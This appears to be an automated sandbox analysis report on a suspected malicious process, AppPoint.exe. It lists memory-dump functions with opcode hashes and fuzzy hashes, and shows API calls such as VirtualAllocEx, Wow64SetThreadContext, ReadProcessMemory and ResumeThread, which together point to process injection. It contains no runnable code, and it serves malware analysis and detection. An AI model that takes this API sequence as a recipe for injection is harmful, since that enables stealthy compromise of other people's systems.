Opcode ID: 6161a38b2d9c8d07cd8688e2bdf7b16f62f068e200e8ffa6320075e24596ba0c
Instruction ID: 53ea834bae9eedf3576be18e4a58f5a08f3ef5c53aed4b5bf6060219ec0eb7b7
Opcode Fuzzy Hash: 6161a38b2d9c8d07cd8688e2bdf7b16f62f068e200e8ffa6320075e24596ba0c
Instruction Fuzzy Hash: 442119B1D002499FCB10DF9AC941AEEBBF5FF48310F10842AE519A7240C7389955CFA1

Function 056A3DD8 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 056A3E58

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 8ed56ef547f29c607c9c804b66b04ad1ed6293191390aafe5542cefe8240481a
Instruction ID: 403f82a0a5d3ce831a2181f219a812c3adfab1e3c0f801532ee9a472caadc0a5
Opcode Fuzzy Hash: 8ed56ef547f29c607c9c804b66b04ad1ed6293191390aafe5542cefe8240481a
Instruction Fuzzy Hash: 6321F5B19003499FCB10DFAAC985AEEFBF5FF48310F50842AE519A7250C778A955CFA1

Function 056A3B49 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056A3BCE

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: c1fdae5e5b25faece5393a8f744f1c3340db2fd0780d8a4ef7e9214368ff9071
Instruction ID: 58ca6b8de9c20d9ab0794e26b6c37f990690be5b8876d4faed98b62462090c56
Opcode Fuzzy Hash: c1fdae5e5b25faece5393a8f744f1c3340db2fd0780d8a4ef7e9214368ff9071
Instruction Fuzzy Hash: CA2125B19002098FDB10DFA9C5857EEBBF5AF58314F14842AD459A7340C778A985CFA5

Function 056A3B50 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 056A3BCE

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: bd509dd463082f28d868b9c6b16f3c0536d6107d96065fc64036ee353c8c792d
Instruction ID: 5c70ffb692638cb78bccdb798780ba2675c61dafa8e9eb666cd2b4d110d48137
Opcode Fuzzy Hash: bd509dd463082f28d868b9c6b16f3c0536d6107d96065fc64036ee353c8c792d
Instruction Fuzzy Hash: 3E2107719003098FDB10DFAAC4857EEBBF5EF58314F14842AD519A7340CB78A985CFA1

Function 0B217D0D Relevance: 1.6, APIs: 1, Instructions: 57memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B217D83

Memory Dump Source

Source File: 0000000B.00000002.2355230578.000000000B210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b210000_AppPoint.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 1f488b508f9b805401c50ae18f924976653a64bf6cb4c128c6ecf7d752e96747
Instruction ID: f5ad001baed90f44ce113ccf449114b911c62dba5e97caaae904cac011238b26
Opcode Fuzzy Hash: 1f488b508f9b805401c50ae18f924976653a64bf6cb4c128c6ecf7d752e96747
Instruction Fuzzy Hash: 5621D6B59002499FCB10DF9AD485BEEFBF4FB48320F108429E558A7251D778A944CFA1

Function 097FAD44 Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,097FCAAA,?,?,?,?,?), ref: 097FCB4F

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 9367523882b04735a62d39e1093e7b992fa8069905d2e88f741c08badcdc3404
Instruction ID: c62e2390b521cdb9c880a2866e748dc61febc862e5e4c081e32c76ad1c0da3f9
Opcode Fuzzy Hash: 9367523882b04735a62d39e1093e7b992fa8069905d2e88f741c08badcdc3404
Instruction Fuzzy Hash: DD116AB680034D9FCB11CF9AD844BDEBFF8EB48310F14841AE654A7210C339A994DFA5

Function 0B217D10 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualProtect.KERNELBASE(?,?,?,?), ref: 0B217D83

Memory Dump Source

Source File: 0000000B.00000002.2355230578.000000000B210000.00000040.00000800.00020000.00000000.sdmp, Offset: 0B210000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_b210000_AppPoint.jbxd

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: b4fe5c9a2f8c6588577161fa389f505b4de7cd644b7e0527935204c985aa283e
Instruction ID: f71f21efa5e3d6dc7ae810c73593918289337a2c99a8c67c1a791be7a48e2184
Opcode Fuzzy Hash: b4fe5c9a2f8c6588577161fa389f505b4de7cd644b7e0527935204c985aa283e
Instruction Fuzzy Hash: 5321E4B59002499FCB10DF9AD484BDEFBF4FF48320F108429E958A7250D378A944CFA1

Function 056A3C28 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056A3C96

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 537922a907f2843bd06d95a7a97b49dbba161517e0bb9cb70d15439e081d3828
Instruction ID: 3227f04ad65ee23350c678e8eca4df175a89e1406a711c82141e8189fa9bf4af
Opcode Fuzzy Hash: 537922a907f2843bd06d95a7a97b49dbba161517e0bb9cb70d15439e081d3828
Instruction Fuzzy Hash: 511137729002499FDB10DFAAC844AEEBFF5FF48310F208819E519A7250C779A954CFA1

Function 056A3C20 Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 056A3C96

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 058357405116139d1392b9825881002dd2f8d1b4f8b6f5944248b29d6efe4b26
Instruction ID: 5c51076d5dccff7582c5c543e60b8a85f593c7be8d3a188bf4e60cafd60517df
Opcode Fuzzy Hash: 058357405116139d1392b9825881002dd2f8d1b4f8b6f5944248b29d6efe4b26
Instruction Fuzzy Hash: 481129759002498FDB10DFAAD9447DEBBF5FF48324F208819D529A7250C7399994CFA1

Function 056A3660 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 056A36CA

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: 520c4c6f79691aaef0ac583e33edea13068ae82e044b90d6cedfaad230ac4eaf
Instruction ID: 803619befc2bdfcf5c14963b5de0cdf7c33ec3aad9e63ef0f3f17202f9fdaefa
Opcode Fuzzy Hash: 520c4c6f79691aaef0ac583e33edea13068ae82e044b90d6cedfaad230ac4eaf
Instruction Fuzzy Hash: 661116B19002498FCB10DFAAD4457EEFBF5EB88314F248819D519A7340CB79A985CFA5

Function 056A3668 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 056A36CA

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: c0d3883731e3e139b5e19273447049e1aa210aaec012200afd8a62a562ac13b0
Instruction ID: cde33addc009ddd06155b09ac7588c5a64967fe5d0598d4236b1c3ead6716bb9
Opcode Fuzzy Hash: c0d3883731e3e139b5e19273447049e1aa210aaec012200afd8a62a562ac13b0
Instruction Fuzzy Hash: B31128B19003498FCB10DFAAC4457AEFBF5EF88314F208819D519A7340CB79A984CFA5

Function 056A0890 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 056A6A5D

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 52f67fa17e93189e1b54c5ef339e7df7c81389f12eca836c6e8ba57eac1f12e6
Instruction ID: 7d7da392c827b9b1713e999f5eae0143c38dc11baceea77dc7b0abcb52be738d
Opcode Fuzzy Hash: 52f67fa17e93189e1b54c5ef339e7df7c81389f12eca836c6e8ba57eac1f12e6
Instruction Fuzzy Hash: 7511F5B58003489FCB10DF99D444BDEBBF8EB48310F24841AE519A7200C379A954CFA5

Function 0151E4C0 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 0151E526

Memory Dump Source

Source File: 0000000B.00000002.2348799219.0000000001510000.00000040.00000800.00020000.00000000.sdmp, Offset: 01510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_1510000_AppPoint.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3902297e5c8a9085fe4b05b7a5ca6bef17bb094ea84e1ae8bfab0d218dc0eeb3
Instruction ID: 35fff8591b512b2d2fedc36b05bc70e4a0454e1ac75cf44ea036a118bd99ff95
Opcode Fuzzy Hash: 3902297e5c8a9085fe4b05b7a5ca6bef17bb094ea84e1ae8bfab0d218dc0eeb3
Instruction Fuzzy Hash: 01110FB5C002498FEB11DF9AD444A9EFBF4EB88310F10842AD918A7200D379A545CFA1

Function 056A69F9 Relevance: 1.5, APIs: 1, Instructions: 46windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 056A6A5D

Memory Dump Source

Source File: 0000000B.00000002.2352444238.00000000056A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 056A0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_56a0000_AppPoint.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: d15687f1938f8b86d035064bab05017388d57e9fc7877583d11a08dbcffaffbb
Instruction ID: c3b265c801cab2208f8bb95cede5a3b97df0f0a0f6eea300e149875e4eadb545
Opcode Fuzzy Hash: d15687f1938f8b86d035064bab05017388d57e9fc7877583d11a08dbcffaffbb
Instruction Fuzzy Hash: 0A11F2B58003489FCB10DF9AD885BDEBFF8EB48310F24845AE558A7200C379A984CFA1

Function 097F8794 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,097FA579,?,?), ref: 097FA720

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: d4709394f766f919c0c3df4fd2fc7ed1b9a159b09fc74d026af2435a227c578d
Instruction ID: dcac557716bec3459f4a5db87d6448f9b3e5a5b85f35b80def69c98ff8e405f4
Opcode Fuzzy Hash: d4709394f766f919c0c3df4fd2fc7ed1b9a159b09fc74d026af2435a227c578d
Instruction Fuzzy Hash: 9B1125B68007499FCB20DF9AD444BEEBBF4EB48320F108469D558A7340D738A984CFA5

Function 097FA6C1 Relevance: 1.3, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,097FA579,?,?), ref: 097FA720

Memory Dump Source

Source File: 0000000B.00000002.2354456728.00000000097F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 097F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_97f0000_AppPoint.jbxd

Similarity

API ID: CloseHandle
String ID:
API String ID: 2962429428-0
Opcode ID: f7eae4a28372c31d883abcb73e9e5ddc3888d4fc3f9ff683d5043a342c481602
Instruction ID: de4012e9986568ab3d21794607c6a6e9d01f9f6b05c8b52334cc768252b78b2a
Opcode Fuzzy Hash: f7eae4a28372c31d883abcb73e9e5ddc3888d4fc3f9ff683d5043a342c481602
Instruction Fuzzy Hash: A91128B58007498FDB20DF9AD444BDEBBF4EF48320F148459D558A7341D739A984CFA5

Function 012BD01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347800206.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f396b654c24388ba808fefa3c98d286c10a1dc3fe6a258523eae240e8323156c
Instruction ID: 6f6c3586eb1c9cfcc17a300aad488bd7c69fbfe7ee7f97e4e81ffafaea3b9e3b
Opcode Fuzzy Hash: f396b654c24388ba808fefa3c98d286c10a1dc3fe6a258523eae240e8323156c
Instruction Fuzzy Hash: 59214570514208DFCB15CF68D5C0B92BF65FB88398F20C96DD9090B256C37AD407CA61

Function 012BD1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347800206.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 04bc8ea73d100685d9db1dfd4070f24bb7be0ba76bcff60fc02cb70487f92bbd
Instruction ID: 90b520028c612f0ca35e6ec2f7aa382091ae5782b1850d566c38ea8903e6212d
Opcode Fuzzy Hash: 04bc8ea73d100685d9db1dfd4070f24bb7be0ba76bcff60fc02cb70487f92bbd
Instruction Fuzzy Hash: 3C212571524248DFDB05DFA8C5C0BA6BB65FB84328F20C56DD9094B257C37AD806CB61

Function 012BD006 Relevance: .1, Instructions: 63COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347800206.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8817b9917e6881c2a7c19b6fb9c6e6395f35ff035a87becbdcd5efc08d2916c0
Instruction ID: 0f4a638905bcb81a3ec442b9fe992139fcd879948a880cd61ebbae90b764964c
Opcode Fuzzy Hash: 8817b9917e6881c2a7c19b6fb9c6e6395f35ff035a87becbdcd5efc08d2916c0
Instruction Fuzzy Hash: C1217F755083849FCB02CF64D994B51BF71EB46314F28C9DAD9498B2A7C33A981ACB62

Function 012BD1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347800206.00000000012BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012BD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12bd000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: b8a228444153feea8868ac6ce5e9ae977f4a846f6113ff90bd7a2389a9d25044
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 3D11BB75504284DFDB02CF54C5C4B55BFA1FB84328F24C6A9D9494B297C33AD40ACB62

Function 012AD745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347729717.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4210bd33ad804d6f0adb87663391f2e507181a28b04d3e47118eee280e3288fb
Instruction ID: 99bb772dc98d8cf9667bd35440205a483dec9811cde01a9a0f80e18ac2c5a91b
Opcode Fuzzy Hash: 4210bd33ad804d6f0adb87663391f2e507181a28b04d3e47118eee280e3288fb
Instruction Fuzzy Hash: 4C012B310143889BE7288F99CD84B67BF9CEF45320F58C52AEE090A696C2799840CA71

Function 012AD744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000B.00000002.2347729717.00000000012AD000.00000040.00000800.00020000.00000000.sdmp, Offset: 012AD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_11_2_12ad000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 33f8286b93a196201e1ec959f9f801ac9ca801ecf7f0c0c67267a8800107f841
Instruction ID: 341aee4037787d5e6cb2c543e3701e3d33ef5ef0b59e73f0fd4ec48544063138
Opcode Fuzzy Hash: 33f8286b93a196201e1ec959f9f801ac9ca801ecf7f0c0c67267a8800107f841
Instruction Fuzzy Hash: 9AF0C2710043849EE7148E1ADC88B62FF98EF41734F18C45AEE084A296C2799844CAB1

Analysis Process: AppPoint.exePID: 7724, Parent PID: 7668COMMON

Executed Functions

Function 06753600 Relevance: 5.6, Strings: 4, Instructions: 605COMMON

Download Yara Rule

Strings

$]q, xrefs: 06753DE3
$]q, xrefs: 06753DD7
$]q, xrefs: 06753E14
$]q, xrefs: 06753DFE

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 5f08885f32f3aa11ebdf87e7a26b79881e1e576b9ca9c67323bbc4ccde0c55f5
Instruction ID: bcb4638c0342dd5dfdf0961891e7a8139e53bec0c4d4cdd9562a0099774a64ec
Opcode Fuzzy Hash: 5f08885f32f3aa11ebdf87e7a26b79881e1e576b9ca9c67323bbc4ccde0c55f5
Instruction Fuzzy Hash: 4A427131E1065A8BCB14EB75C9546EDB7F2FFC9340F1086A9D50AAB261EF709D85CB80

Function 067582B8 Relevance: 3.0, Strings: 2, Instructions: 519COMMON

Download Yara Rule

Strings

$]q, xrefs: 067588D2
$]q, xrefs: 067588DE

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: 51be0055c75fb438f48ff08b0728f5f9c4e760d4a88fe29325251a22530df036
Instruction ID: 1d99a60594a132faad999915f36596875b64d3956393572f0f82cd2fcdee354d
Opcode Fuzzy Hash: 51be0055c75fb438f48ff08b0728f5f9c4e760d4a88fe29325251a22530df036
Instruction Fuzzy Hash: E702B030B002158FDB54DB79D551AAEB7E2FF84304F158569E80AEB381DF79EC428B92

Function 06756043 Relevance: 2.9, Strings: 2, Instructions: 432COMMON

Download Yara Rule

Strings

\Obq, xrefs: 067561AC
XPbq, xrefs: 06756169

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: XPbq$\Obq
API String ID: 0-409418754
Opcode ID: 784ad121b73a5c198e34c05bb8e51cf43ccfc2940a75167cbeca56fcc3992dfb
Instruction ID: 275de9a2c9de8e9b208dfd346b6d2a4f9a6898ca3b7a90b807f154381eed61bc
Opcode Fuzzy Hash: 784ad121b73a5c198e34c05bb8e51cf43ccfc2940a75167cbeca56fcc3992dfb
Instruction Fuzzy Hash: 69E1F831F101548FDB54DB68C494BAEBBF2EF89710F6684AAE849DB362CA71DC41C790

Function 0675CC50 Relevance: .7, Instructions: 741COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9acd388cafba41ede8bfdf678fe642878d2e9fff1bbbbe46d6dcf38bd7d19666
Instruction ID: 5c5028398b5dc524cc149ee3236fff0abd0915a16e44cf2052a3159f601360e0
Opcode Fuzzy Hash: 9acd388cafba41ede8bfdf678fe642878d2e9fff1bbbbe46d6dcf38bd7d19666
Instruction Fuzzy Hash: 5442B130B002098FDB54DB78D951BAEB7E6FF88344F118469E90ADB391DE79DC428B91

Function 0675B6A8 Relevance: 10.4, Strings: 8, Instructions: 415COMMON

Download Yara Rule

Strings

$]q, xrefs: 0675B83E
$]q, xrefs: 0675B7D9
$]q, xrefs: 0675B896
$]q, xrefs: 0675B873
$]q, xrefs: 0675B7E5
$]q, xrefs: 0675B867
$]q, xrefs: 0675B832
$]q, xrefs: 0675B8A2

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q$$]q$$]q$$]q$$]q
API String ID: 0-1273862796
Opcode ID: 1796f7abb2a77dad774faf9a9f620520f729dd130694fe96c4e6e5c6af33f92d
Instruction ID: 55bfc1a15d85847f71efc0c0c538a474f837e7aa887fcbdb04672a6e83aa3289
Opcode Fuzzy Hash: 1796f7abb2a77dad774faf9a9f620520f729dd130694fe96c4e6e5c6af33f92d
Instruction Fuzzy Hash: 5CE18130E0020A8FDB58DFA9D991ABEB7B2FF84704F118569D806AB345DF75D846CB81

Function 067597E0 Relevance: 5.3, Strings: 4, Instructions: 280COMMON

Download Yara Rule

Strings

$]q, xrefs: 06759853
$]q, xrefs: 067598B3
$]q, xrefs: 06759847
$]q, xrefs: 067598C9

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q$$]q
API String ID: 0-858218434
Opcode ID: 98c03f2110a728b42feea2b3b1814651086bc008499d2751a042b26be540aa81
Instruction ID: e2b5308e62719bbaed7e0a7a36d5b30437c00e2013d61554f92133ce3b82e94b
Opcode Fuzzy Hash: 98c03f2110a728b42feea2b3b1814651086bc008499d2751a042b26be540aa81
Instruction Fuzzy Hash: 00C13730E002598FDB64DF65C951BEEB7B2FF88344F1085A9D909AB340DB719E858F92

Function 0675DB80 Relevance: 4.7, Strings: 3, Instructions: 914COMMON

Download Yara Rule

Strings

$]q, xrefs: 0675E01B
$]q, xrefs: 0675E027
$]q, xrefs: 0675E013

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q$$]q
API String ID: 0-182748909
Opcode ID: c50fe317917aab852e676fe7ae1609c816bfb56fde246536d9c9c4f61ef8c69e
Instruction ID: 67133f07ea68fe2e13c8f28bd9fc923d5ac36a3263af327cb86e6c7858e6d29a
Opcode Fuzzy Hash: c50fe317917aab852e676fe7ae1609c816bfb56fde246536d9c9c4f61ef8c69e
Instruction Fuzzy Hash: 8B72AF34A002198FDB64EB64C951BADB7B3FF85340F2184A9D40AAB342DF759D82CB95

Function 06754E98 Relevance: 3.9, Strings: 3, Instructions: 174COMMON

Download Yara Rule

Strings

fbq, xrefs: 06754EC3
\Obq, xrefs: 0675504B
XPbq, xrefs: 06754FBC

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: fbq$XPbq$\Obq
API String ID: 0-4057264190
Opcode ID: ccf22319764952ab795296b6a17a1413812e15fb7c3db6ffba7695ae52aacb44
Instruction ID: 55f387f7967941a45519ba6b9c406aa101e348812d7ffe886fd86325ba85053b
Opcode Fuzzy Hash: ccf22319764952ab795296b6a17a1413812e15fb7c3db6ffba7695ae52aacb44
Instruction Fuzzy Hash: 4F51C630F001199FEB549BB5C4157AEBAE7FB88354F214429E50AEB381CE754D018F91

Function 067597CF Relevance: 2.7, Strings: 2, Instructions: 205COMMON

Download Yara Rule

Strings

$]q, xrefs: 067598B3
$]q, xrefs: 06759847

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: $]q$$]q
API String ID: 0-127220927
Opcode ID: b25766db6f1c0dc670c9c286196deec8edc584b989038e88ef6a749cd4b62150
Instruction ID: 82f2b4075c7f0a70f31f3ed1bfeb8ea7b75f8b66f7bcc1e11620c604ad41c389
Opcode Fuzzy Hash: b25766db6f1c0dc670c9c286196deec8edc584b989038e88ef6a749cd4b62150
Instruction Fuzzy Hash: CF911770E002199FDBA4DB64C951BEEB7F2FF88344F0085A9990DA7341DA359E85CF92

Function 06754E88 Relevance: 2.6, Strings: 2, Instructions: 129COMMON

Download Yara Rule

Strings

fbq, xrefs: 06754EC3
XPbq, xrefs: 06754FBC

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: fbq$XPbq
API String ID: 0-2292610095
Opcode ID: 5f7c62e5da318c370f0ba5bf762101aa08bfbe046e28a86979c95e8b45f84ceb
Instruction ID: 99785e1460c587c8de9c14768690f5c46a591908465af2423f5ad098e8777e04
Opcode Fuzzy Hash: 5f7c62e5da318c370f0ba5bf762101aa08bfbe046e28a86979c95e8b45f84ceb
Instruction Fuzzy Hash: D541C530B001599BEB549FB9C8157AE7AE7BB88700F218429E505EB3C5DE798D028F91

Function 067522A8 Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

PH]q, xrefs: 067523FA

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6750000_AppPoint.jbxd

Similarity

API ID:
String ID: PH]q
API String ID: 0-3168235125
Opcode ID: 20e273d15915c8fc0d88f7e46b667a62834acf6f38f4b0db1844630fb15ed173
Instruction ID: 28d7c8ffaa89d2d20892c7633de6f18e2488cc72aebcab3d9a351a5a049e1fe4
Opcode Fuzzy Hash: 20e273d15915c8fc0d88f7e46b667a62834acf6f38f4b0db1844630fb15ed173
Instruction Fuzzy Hash: FB312E30B002458FDB48AB78C82576E7AE7BF89240F21447CD406DB396DE79DE02C7A1

Function 0675BF0E Relevance: .3, Instructions: 304COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000C.00000002.4547992575.0000000006750000.00000040.00000800.00020000.00000000.sdmp, Offset: 06750000, based on PE: false

Joe Sandbox IDA Plugin

